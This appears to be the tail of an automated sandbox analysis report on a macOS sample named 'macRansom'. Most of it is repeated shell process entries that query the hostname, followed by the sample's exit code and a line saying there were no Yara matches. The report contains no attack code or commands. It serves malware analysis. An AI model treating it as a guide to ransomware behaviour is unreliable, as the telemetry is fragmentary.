Source: /bin/sh (PID: 813)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 814)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 816)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 817)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 819)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 820)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 822)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 823)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 825)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 826)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 828)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 829)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 831)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 832)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 834)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 835)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 837)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 838)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 840)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 841)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 843)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 844)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 846)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 847)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 849)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 850)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 852)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 853)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 855)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 856)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 858)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 859)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 861)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 862)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 864)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 865)Sysctl requested: kern.hostname (1.10)


Runtime Messages

Command:/Users/vreni/Desktop/macRansom
Exitcode:55
Killed:False
Standard Output:Done
Standard Error:

Yara Overview

No Yara matches

Screenshot